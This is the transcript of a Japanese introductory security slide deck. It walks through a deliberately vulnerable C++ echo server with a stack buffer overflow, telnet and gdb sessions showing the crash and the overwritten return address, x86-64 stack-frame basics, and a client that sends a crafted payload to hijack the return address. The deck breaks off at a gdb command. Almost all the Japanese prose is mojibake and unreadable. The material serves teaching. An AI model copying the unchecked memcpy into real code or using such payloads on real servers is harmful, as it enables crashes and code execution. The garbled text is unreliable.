Upgrade to Pro — share decks privately, control downloads, hide ads and more …

セキュリティ入門

Fadis
April 12, 2018

 セキュリティ入門

Fadis

April 12, 2018
Tweet

More Decks by Fadis

Other Decks in Programming

Transcript

  1. ηΩϡϦςΟೖ໳
    NAOMASA MATSUBAYASHI

    View Slide

  2. ηΩϡϦςΟͷ໨ඪ

    View Slide

  3. େࣄͳσʔλ
    αʔό
    ળྑͳϢʔβ
    ѱҙ͋ΔϢʔβ
    େࣄͳσʔλΛकΔ࠷΋؆୯Ͱ࣮֬ͳํ๏͸
    Ұ੾ͷΞΫηεΛड͚෇͚ͳ͍ࣄͰ͋Δ

    View Slide

  4. େࣄͳσʔλ
    ળྑͳϢʔβ
    ѱҙ͋ΔϢʔβ
    αʔό
    ͔͠͠αʔό͸αʔϏεΛఏڙ͢ΔͨΊʹ
    ϢʔβͷཁٻΛड͚෇͚ͳ͚Ε͹ͳΒͳ͍

    View Slide

  5. େࣄͳσʔλ
    ળྑͳϢʔβ
    ѱҙ͋ΔϢʔβ
    αʔό
    ҙਤͨ͠௨Γʹ࢖͏ϢʔβΛड͚෇͚ͳ͕Β
    ҙਤ͠ͳ͍࢖͍ํΛ͢ΔϢʔβΛڋ൱͢Δඞཁ͕͋Δ

    View Slide

  6. ༏ΕͨηΩϡϦςΟͱ͸
    ҙਤͨ͠࢖͍ํͱ
    ҙਤ͠ͳ͍࢖͍ํΛ
    ΑΓਖ਼֬ʹࣝผ͢Δ͜ͱ͕Ͱ͖Δࣄ

    View Slide

  7. ҙਤ͠ͳ͍࢖͍ํͱ͸

    View Slide

  8. #include
    #include
    #include
    namespace asio = boost::asio;
    using boost::asio::ip::tcp;
    using sock_p = std::shared_ptr< tcp::socket >;
    using buf_p = std::shared_ptr< asio::streambuf >;
    using error_type = boost::system::error_code;
    struct session : public std::enable_shared_from_this< session > {
    session( asio::io_service &io ) : sock( io ) {}
    void read() {
    boost::asio::async_read_until( sock, buf, '\n', boost::bind(
    &session::check_on_read, shared_from_this(),
    asio::placeholders::bytes_transferred, asio::placeholders::error
    ) );
    }
    void write( const char *data, size_t len ) {
    boost::asio::async_write( sock, boost::asio::buffer( data, len ), boost::bind(
    &session::check_on_write, shared_from_this(), asio::placeholders::error
    ) );
    }
    tcp::socket &get_socket() { return sock; }
    private:
    void check_on_read( size_t len, const error_type& e ) {
    if( e && e != boost::asio::error::eof ) return;
    on_read( len );
    }
    void on_read( size_t len ) {
    char received[ 32 ];
    std::memcpy( received, asio::buffer_cast( buf.data() ), len );
    buf.consume( len );
    https://wandbox.org/permlink/eucMJp4DkeLhnGlq
    όάͷ͋ΔΤίʔαʔό

    View Slide

  9. buf.consume( len );
    received[ len ] = '\0';
    write( received, len );
    }
    void check_on_write( const error_type& e ) {
    if( e && e != boost::asio::error::eof ) return;
    on_write();
    }
    void on_write() { read(); }
    tcp::socket sock;
    asio::streambuf buf;
    };
    struct server {
    server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); }
    void accept() {
    std::shared_ptr< session > s( new session( io ) );
    acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) );
    }
    private:
    void on_accept( const std::shared_ptr< session > &s, const error_type& e ) {
    if( !e ) s->read();
    accept();
    }
    asio::io_service &io;
    boost::asio::ip::tcp::acceptor acc;
    };
    int main() {
    asio::io_service io;
    server s( io );
    io.run();
    } https://wandbox.org/permlink/eucMJp4DkeLhnGlq
    όάͷ͋ΔΤίʔαʔό

    View Slide

  10. }
    void on_read( size_t len ) {
    char received[ 32 ];
    std::memcpy( received, asio::buffer_cast( buf.data() ), len );
    buf.consume( len );
    received[ len ] = '\0';
    write( received, len );
    }
    void check_on_write( const error_type& e ) {
    if( e && e != boost::asio::error::eof ) return;
    on_write();
    }
    void on_write() { read(); }
    tcp::socket sock;
    asio::streambuf buf;
    };
    struct server {
    server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); }
    void accept() {
    std::shared_ptr< session > s( new session( io ) );
    acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) );
    }
    private:
    void on_accept( const std::shared_ptr< session > &s, const error_type& e ) {
    if( !e ) s->read();
    accept();
    }
    asio::io_service &io;
    boost::asio::ip::tcp::acceptor acc;
    };
    int main() {
    asio::io_service io;
    https://wandbox.org/permlink/eucMJp4DkeLhnGlq
    ݻఆ௕ ௨৴Ͱड͚औͬͨσʔλ͕
    ݻఆ௕ͷ഑ྻʹऩ·ΔαΠζͱ͸ݶΒͳ͍
    ϦϞʔτ͔ΒόοϑΝΦʔόʔϥϯΛىͤ͜Δ
    όάͷ͋ΔΤίʔαʔό
    void on_read( size_t len ) {
    char received[ 32 ];
    std::memcpy( received, asio::buffer_cast( buf.data() ), len );
    buf.consume( len );
    received[ len ] = '\0';
    write( received, len );
    }

    View Slide

  11. $ ./tiny_server
    $ telnet localhost 20000
    Trying ::1...
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    Hello, World!
    Hello, World!
    ૹ৴ͨ͠σʔλ όΠτ

    ΫϥΠΞϯτ αʔό
    ड৴ͨ͠σʔλ όΠτ

    receivedͷαΠζʹऩ·͍ͬͯΔ৔߹ɺҙਤͨ͠ಈ͖Λ͍ͯ͠Δ

    View Slide

  12. $ telnet localhost 20000
    Trying ::1...
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    Hello, World! I would like to
    crash this server. Blah blah
    blah...
    Hello, World! I would like to
    crash this server. Blah blah
    blah...
    Connection closed by foreign
    host.
    ΫϥΠΞϯτ αʔό
    $ ./tiny_server
    Segmentation fault
    αʔό͕ࢮΜͩ

    View Slide

  13. ߈ܸऀ͕αʔϏεΛར༻ෆೳʹͰ͖ΔࣄΛ
    Denial of Service߈ܸ
    ུͯ͠DoS߈ܸ͕Մೳͱݴ͏

    View Slide

  14. ͱ͜ΖͰ͖ͬ͞ͷαʔό͸
    ԿނࢮΜͩ

    View Slide

  15. $ gdb -q tiny_server
    Reading symbols from tiny_server...done.
    (gdb) disas session::on_read
    Dump of assembler code for function session::on_read(unsigned long):

    0x000000000040a6c3 <+69>: callq 0x403340
    0x000000000040a6c8 <+74>: mov -0x38(%rbp),%rax

    (gdb) b *0x40a6c3
    Breakpoint 1 at 0x40a6c3: file tiny_server.cpp, line 38.
    (gdb) b *0x40a6c8
    Breakpoint 2 at 0x40a6c8: file tiny_server.cpp, line 39.
    (gdb) run
    Starting program: /home/fadis/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at
    tiny_server.cpp:38
    38 std::memcpy( received, asio::buffer_cast( buf.data() ), len );
    (gdb) p &received
    $1 = (char (*)[32]) 0x7fffffffd2c0
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000
    0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000
    σόοΨͰαʔό͕ࢮΜͩॠؒΛݟͯΈΑ͏
    Ͳ͜ʹ໰୊͕͋Δ͔͸طʹΘ͔͍ͬͯΔͷͰ
    όοϑΝΦʔόʔϥϯΛҾ͖ى͜͢memcpyͷલޙͰ
    ϒϨʔΫϙΠϯτΛு͓ͬͯ͘

    View Slide

  16. Starting program: /home/fadis/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at
    tiny_server.cpp:38
    38 std::memcpy( received, asio::buffer_cast( buf.data() ), len );
    (gdb) p &received
    $1 = (char (*)[32]) 0x7fffffffd2c0
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000
    0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000
    0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000
    0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000
    0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
    ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ
    receivedʹॻ͖ࠐΉ௚લͷ
    received͔Β256όΠτͷϝϞϦͷঢ়ଶ
    receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ

    View Slide

  17. 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
    0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
    0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    (gdb) c
    Continuing.
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    42 }
    ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ
    receivedʹॻ͖ࠐΜͩ௚ޙͷ
    received͔Β256όΠτͷϝϞϦͷঢ়ଶ
    receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ

    View Slide

  18. 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
    0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
    0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    (gdb) c
    Continuing.
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    42 }
    ͜ͷҐஔʹվߦจࣈ͕ݟ͑ΔͨΊ
    ഑ྻͷऴ୺Λ௒͑ͯ
    ͜͜·Ͱॻ͖ࠐΈ͕ߦΘΕͨ͜ͱ͕Θ͔Δ
    receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ

    View Slide

  19. (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    (gdb) c
    Continuing.
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    42 }
    (gdb) backtrace
    #0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    #1 0x2e68616c62206861 in ?? ()
    #2 0x000000000a0d2e2e in ?? ()
    #3 0x00007fffffffd5d0 in ?? ()
    #4 0x0000000000000044 in ?? ()
    #5 0x0000000000632ef0 in ?? ()
    #6 0x00007fffffffd340 in ?? ()
    #7 0x0000000000412898 in boost::get_pointer (
    p=)
    at /usr/include/boost/get_pointer.hpp:69
    Backtrace stopped: Cannot access memory at address 0x6c622068616c4228
    (gdb) disas

    => 0x000000000040a706 <+136>: retq
    End of assembler dump.
    (gdb)
    Կॲ
    ࣮ߦΛଓ͚Δͱon_read͔Βreturnͨ͠ॴͰࢮ͵
    όοΫτϨʔεΛݟΔͱon_read͕ฦΖ͏ͱͨ͠
    ݺͼग़͠ݩͷؔ਺ͷΞυϨε͕͓͔͍͠

    View Slide

  20. 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
    0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
    0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    (gdb) c
    Continuing.
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    42 }
    (gdb) backtrace
    #0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    #1 0x2e68616c62206861 in ?? ()
    #2 0x000000000a0d2e2e in ?? ()
    ͜ͷΞυϨε͸
    ͖ͬ͞ॻ͖ࠐΜͩϝοηʔδͷҰ෦ͩ

    View Slide

  21. $16ͷߏ଄
    CPU
    rax rbx
    rcx rdx
    rsi rdi
    rbp rsp
    r8 r9
    r10 r11
    r12 r13
    r14 r15
    ࠓ೔ͷIntelϓϩηοαʹ͸
    ܭࢉʹ࢖͏஋ΛೖΕ͓ͯ͘ശ(Ϩδελ)͕
    16ݸඋΘ͍ͬͯΔ
    16ݸͰ͸଍Γͳ͘ͳͬͨΒ
    ࠓ͙͍͢Βͳ͍஋ΛϝϞϦʹҠͯ͠ϨδελΛۭ͚Δ

    View Slide

  22. ελοΫ
    CPU
    rax rbx
    rcx rdx
    rsi rdi
    rbp rsp
    r8 r9
    r10 r11
    r12 r13
    r14 r15
    Ϩδελ͔Βୀආͨ͠஋͕ੵ·Ε͍ͯ͘
    ୀආͨ͠஋͕࠶ͼඞཁʹͳͬͨΒ
    ্͔ΒऔΓग़͍ͯ͘͠
    rdi͔ΒҠͨ͠஋
    rax͔ΒҠͨ͠஋
    rbp͔ΒҠͨ͠஋
    rdi͔ΒҠͨ͠஋
    ͜ͷΑ͏ʹ࢖ΘΕΔϝϞϦྖҬΛ
    ελοΫͱݺͿ

    View Slide

  23. ελοΫ
    int f( int x, int y ) {
    int i;
    i = x * y;
    return i;
    }
    ͜ͷiͷΑ͏ͳϩʔΧϧม਺͸
    ελοΫͷதʹஔ͔Ε͍ͯΔ
    ଞͷม਺౳
    ଞͷม਺౳
    ଞͷม਺౳
    i
    ϩʔΧϧม਺͕࡞ΒΕΔͱελοΫʹ஋͕ੵ·Ε
    είʔϓΛൈ͚ΔͱελοΫͷ஋͕ഁغ͞ΕΔ

    View Slide

  24. int f( int i, int j ) {
    return i + j;
    }
    int g() {
    return f( 2, 3 );
    }
    ؔ਺ݺͼग़͠Λߦ͏ͱcallq໋ྩ͕ੜ੒͞ΕΔ
    return͢Δͱretq໋ྩ͕ੜ੒͞ΕΔ
    00000000004004b6 :
    4004b6: 55 push %rbp
    4004b7: 48 89 e5 mov %rsp,%rbp
    4004ba: 89 7d fc mov %edi,-0x4(%rbp)
    4004bd: 89 75 f8 mov %esi,-0x8(%rbp)
    4004c0: 8b 55 fc mov -0x4(%rbp),%edx
    4004c3: 8b 45 f8 mov -0x8(%rbp),%eax
    4004c6: 01 d0 add %edx,%eax
    4004c8: 5d pop %rbp
    4004c9: c3 retq
    00000000004004ca :
    4004ca: 55 push %rbp
    4004cb: 48 89 e5 mov %rsp,%rbp
    4004ce: be 03 00 00 00 mov $0x3,%esi
    4004d3: bf 02 00 00 00 mov $0x2,%edi
    4004d8: e8 d9 ff ff ff callq 4004b6
    4004dd: 5d pop %rbp
    4004de: c3 retq
    callq͸ελοΫʹ
    callqͷ࣍ͷΞυϨεΛੵΜͰ
    Ҿ਺Ͱࢦఆ͞ΕͨΞυϨεʹඈͿ
    retq͸ελοΫͷઌ಄ʹੵ·Εͨ
    ΞυϨεʹඈΜͰ
    ελοΫͷઌ಄ͷ஋ΛࣺͯΔ
    ͜ͷ૊Έ߹ΘͤͰ
    ؔ਺Λൈ͚ͨΒݩͷ৔ॴʹ໭Δ
    ͕࣮ݱ͞Ε͍ͯΔ

    View Slide

  25. ؔ਺fͷม਺
    ؔ਺fͷม਺
    ؔ਺fͷม਺
    ؔ਺g͕ऴΘͬͨΒ໭ΔҐஔ
    ؔ਺gͷม਺
    ؔ਺gͷม਺
    ؔ਺h͕ऴΘͬͨΒ໭ΔҐஔ
    ؔ਺hͷม਺
    ؔ਺hͷม਺
    ؔ਺hͷม਺
    ؔ਺f͕ؔ਺gΛݺΜͰ
    ͦͷதͰؔ਺h͕ݺ͹Ε͍ͯΔ࣌ͷελοΫ
    ࣮ߦதͷؔ਺ʹͱͬͯͷ
    ελοΫͷઌ಄ͱ຤ඌͷҐஔ͸$16ͷ
    %rspϨδελͱ%rbpϨδελʹ
    ه࿥͞Ε͍ͯΔ

    View Slide

  26. ؔ਺fͷม਺
    ؔ਺fͷม਺
    ؔ਺fͷม਺
    ؔ਺g͕ऴΘͬͨΒ໭ΔҐஔ
    ؔ਺gͷม਺
    ؔ਺gͷม਺
    ؔ਺h͕ऴΘͬͨΒ໭ΔҐஔ
    ؔ਺hͷม਺
    ؔ਺hͷม਺
    ؔ਺hͷม਺
    ؔ਺͸callq͞ΕͨΒ·ͣ
    ݱࡏͷ%rbpΛελοΫʹੵΜͰ
    %rbpΛ%rspʹ͢Δ
    ͭ·Γݺͼग़͠ݩͷؔ਺ͷελοΫͷઌ಄Λ
    ͜Ε͔Β࣮ߦ͢Δؔ਺ͷελοΫͷ຤ඌʹ͢Δ

    ؔ਺fͷSCQ
    ؔ਺gͷSCQ
    ؔ਺͔Βretq͢Δ௚લʹ
    %rbpΛελοΫͷઌ಄ͷ஋ʹͯ͠
    ελοΫͷઌ಄ͷ஋Λഁغ͢Δ

    View Slide

  27. 00000000004004b6 :
    4004b6: 55 push %rbp
    4004b7: 48 89 e5 mov %rsp,%rbp
    4004ba: 89 7d fc mov %edi,-0x4(%rbp)
    4004bd: 89 75 f8 mov %esi,-0x8(%rbp)
    4004c0: 8b 55 fc mov -0x4(%rbp),%edx
    4004c3: 8b 45 f8 mov -0x8(%rbp),%eax
    4004c6: 01 d0 add %edx,%eax
    4004c8: 5d pop %rbp
    4004c9: c3 retq
    00000000004004ca :
    4004ca: 55 push %rbp
    4004cb: 48 89 e5 mov %rsp,%rbp
    4004ce: be 03 00 00 00 mov $0x3,%esi
    4004d3: bf 02 00 00 00 mov $0x2,%edi
    4004d8: e8 d9 ff ff ff callq 4004b6
    4004dd: 5d pop %rbp
    4004de: c3 retq
    SCQΛελοΫʹੵΉ
    SCQΛSTQͷ஋ʹ͢Δ
    SCQΛελοΫͷ஋ʹ͢Δ
    ελοΫʹॻ͔ΕͨΞυϨεʹ໭Δ
    ͜ͷล͕ؔ਺ͷॲཧͷຊମ

    View Slide

  28. (gdb) run
    Starting program: /home/fadis/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at
    tiny_server.cpp:38
    38 std::memcpy( received, asio::buffer_cast( buf.data() ), len );
    (gdb) p &received
    $1 = (char (*)[32]) 0x7fffffffd2c0
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000
    0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000
    0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000
    0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000
    0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    ͔͜͜Β্͕
    on_readͷελοΫ
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ
    %rbpͱ%rspͷ஋
    on_readΛݺͼग़ͨؔ͠਺ͷ%rbp
    on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε
    όοϑΝΦʔόʔϥϯલ

    View Slide

  29. 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
    0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
    0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    (gdb) c
    Continuing.
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    ͔͜͜Β্͕
    on_readͷελοΫ
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ
    %rbpͱ%rspͷ஋
    on_readΛݺͼग़ͨؔ͠਺ͷ%rbp
    on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε
    όοϑΝΦʔόʔϥϯޙ
    returnΞυϨε͕ॻ͖׵Θͬͯ͠·ͬͨ

    View Slide

  30. #1 0x2e68616c62206861 in ?? ()
    #2 0x000000000a0d2e2e in ?? ()
    returnΞυϨε͕ॻ͖׵Θͬͨঢ়ଶͰretqͨ݁͠Ռ
    ΞυϨε͕ࢦ͢ઌͷϝϞϦʹΞΫηεͰ͖ͳ͔ͬͨҝ
    ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠
    όοϑΝΦʔόʔϥϯʹΑͬͯ
    ഑ྻreceivedͷઌʹஔ͍ͯ͋ͬͨ
    returnΞυϨε͕ॻ͖׵͑ΒΕͯ͠·ͬͨ

    View Slide

  31. ॻ͖׵͑ΒΕͨΞυϨε͕
    ΞΫηεՄೳͩͬͨΒ
    Կ͕ى͍ͬͯͨ͜

    View Slide

  32. #include
    #include
    int main() {
    namespace asio = boost::asio;
    using boost::asio::ip::tcp;
    asio::io_service io_service;
    tcp::socket socket(io_service);
    socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) );
    std::vector< uint8_t > data {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    0x0d, 0x0a,
    };
    boost::system::error_code error;
    asio::write(socket, asio::buffer(data), error);
    return 0;
    if( !error ) {
    asio::streambuf receive_buffer;
    asio::read_until(socket, receive_buffer, '\n', error);
    std::cout << asio::buffer_cast(receive_buffer.data()) << std::endl;
    }
    }
    ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ

    View Slide

  33. #include
    #include
    int main() {
    namespace asio = boost::asio;
    using boost::asio::ip::tcp;
    asio::io_service io_service;
    tcp::socket socket(io_service);
    socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) );
    std::vector< uint8_t > data {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    0x0d, 0x0a,
    };
    boost::system::error_code error;
    asio::write(socket, asio::buffer(data), error);
    return 0;
    if( !error ) {
    asio::streambuf receive_buffer;
    asio::read_until(socket, receive_buffer, '\n', error);
    std::cout << asio::buffer_cast(receive_buffer.data()) << std::endl;
    }
    }
    (gdb) disas abort
    Dump of assembler code for function abort:
